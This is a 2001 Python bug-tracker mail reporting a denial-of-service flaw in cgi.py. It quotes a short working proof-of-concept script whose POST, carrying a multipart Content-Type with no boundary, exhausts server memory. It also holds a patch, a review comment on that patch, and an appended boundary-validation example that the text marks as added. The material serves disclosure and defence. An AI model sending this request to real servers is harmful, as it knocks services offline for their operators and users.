[Python-bugs-list] [ python-Bugs-443120 ] denial-of-service attack to cgi.py

noreply@sourceforge.net noreply@sourceforge.net
Sun, 22 Jul 2001 18:48:40 -0700


Bugs item #443120, was opened at 2001-07-20 09:13
You can respond by visiting: 
http://sourceforge.net/tracker/?func=detail&atid=105470&aid=443120&group_id=5470

Category: Python Library
Group: None
Status: Open
Resolution: None
Priority: 5
Submitted By: Guido van Rossum (gvanrossum)
Assigned to: Nobody/Anonymous (nobody)
Summary: denial-of-service attack to cgi.py

Initial Comment:
I got this in the mail:

"""
Subject: Bug in cgi.py, denial-of-service possible
From: Richard Jones <richard@bizarsoftware.com.au>
To: guido@python.org, support@digicool.com
Date: Fri, 20 Jul 2001 17:43:15 +1000

The inner workings of cgi.py are still a mystery to me, so I can't offer a
patch. Sorry.

The following code will effect a denial-of-service against any server running
cgi.py (and hence Zope).


import httplib
params = '\n'*10
h = httplib.HTTP('localhost', 8080)
h.putrequest('POST', '/')
# The Content-type header carries no boundary parameter; that is the
# condition cgi.py mishandles (see below).
h.putheader('Content-type', 'multipart/form-data')
h.putheader('Content-length', str(len(params)))
h.endheaders()
h.send(params)


The key here is the missing boundary from the content-type header. From my
observation, it seems that cgi.py defaults the boundary to "" which means
that it matches boundaries without progressing through the input - creating
new FieldStorage instances for each match. The result is all available RAM
gobbled up eventually. I recommend testing this on a system on which you can
easily kill the server process.



    Richard

-- 
Richard Jones
richard@bizarsoftware.com.au
Senior Software Developer, Bizar Software
(www.bizarsoftware.com.au)
"""


----------------------------------------------------------------------

Comment By: Richard Jones (richard)
Date: 2001-07-22 18:48

Message:
Logged In: YES 
user_id=6405

This is a patch - it's against a patched cgi.py (I've applied the fix for
"too many open files"). RFC 2046 requires a boundary argument for the
multipart content types (http://www.ietf.org/rfc/rfc2046.txt, 5.1.1, second
paragraph). This patch does fix the given exploit.


*** /usr/lib/python2.1/cgi.py	Tue Jul 10 14:29:37 2001
--- cgi.py	Mon Jul 23 11:37:45 2001
***************
*** 514,519 ****
--- 514,521 ----
          if ctype == 'application/x-www-form-urlencoded':
              self.read_urlencoded()
          elif ctype[:10] == 'multipart/':
+             if not self.innerboundary:
+                 raise ValueError, 'multipart message 
with no boundary'
              self.read_multi(environ, keep_blank_values, 
strict_parsing)
          else:
              self.read_single()
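Review bot: the `if not self.innerboundary:` check rejects only a missing or empty boundary; it does not validate the value against the RFC 2046 5.1.1 grammar the comment cites (1 to 70 characters from the permitted set, not ending in a space), so a malformed boundary still reaches read_multi. Consider checking length and character set at the same point, and documenting that FieldStorage now raises ValueError for multipart input without a boundary, since a caller that does not catch it will surface the error as a server failure rather than a rejected request. Also, the string in `raise ValueError, 'multipart message with no boundary'` has been wrapped onto two lines in the mail and must be rejoined before the patch will apply.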



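The missing-boundary condition described in the report and the RFC 2046 section 5.1.1 requirement cited in the comment above, as an added example that is not part of this bug report or of cgi.py: a Content-Type header parser with a boundary check that a CGI front end could run before handing the request body to any multipart parser. The header strings in it are constructed for the example, and the boundary grammar (1 to 70 characters from a restricted set, not ending in a space) is taken from RFC 2046 5.1.1.

```python
"""Validate the Content-Type header of a multipart request before parsing it.

Added example, not code from the bug report or from cgi.py. It enforces the
RFC 2046 section 5.1.1 rule that every multipart/* content type must carry a
boundary parameter, which is exactly what the request in the report omits.
"""
import re

# bcharsnospace from RFC 2046 5.1.1; a space is also allowed, except as the
# final character. The whole boundary is 1 to 70 characters long.
_BCHARS_NOSPACE = r"0-9A-Za-z'()+_,\-./:=?"
_BOUNDARY_RE = re.compile(
    r"^[" + _BCHARS_NOSPACE + r" ]{0,69}[" + _BCHARS_NOSPACE + r"]$"
)


def parse_content_type(header):
    """Split 'type/subtype; k=v; k2="v 2"' into (type, {name: value}).

    Parameter names are lowercased; quoted values have their quotes removed.
    """
    parts = [p.strip() for p in header.split(";")]
    ctype = parts[0].lower()
    params = {}
    for part in parts[1:]:
        if "=" not in part:
            continue  # ignore malformed parameter fragments
        name, value = part.split("=", 1)
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        params[name.strip().lower()] = value
    return ctype, params


def check_multipart_boundary(header):
    """Return (ok, reason).

    ok is True when the header is not multipart at all, or is multipart with a
    boundary parameter that satisfies the RFC 2046 5.1.1 grammar. An absent or
    empty boundary (the report's case) and a malformed one are both rejected.
    """
    ctype, params = parse_content_type(header)
    if not ctype.startswith("multipart/"):
        return True, "not multipart"
    boundary = params.get("boundary")
    if boundary is None:
        return False, "multipart content type without a boundary parameter"
    if not _BOUNDARY_RE.match(boundary):
        return False, "boundary violates RFC 2046 5.1.1 syntax"
    return True, "ok"


if __name__ == "__main__":
    # Constructed headers: the first is the one sent by the request in the report.
    samples = [
        "multipart/form-data",
        "multipart/form-data; boundary=----ExampleBoundary1234",
        'multipart/mixed; boundary=""',
        "multipart/mixed; boundary=" + "a" * 71,
        "application/x-www-form-urlencoded",
    ]
    for h in samples:
        ok, reason = check_multipart_boundary(h)
        print("%-60s -> %s (%s)" % (h[:60], "accept" if ok else "reject", reason))
```

A front end that runs this check can answer a malformed multipart request with a 400 before constructing a FieldStorage, so the parser never sees an empty boundary at all.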
----------------------------------------------------------------------
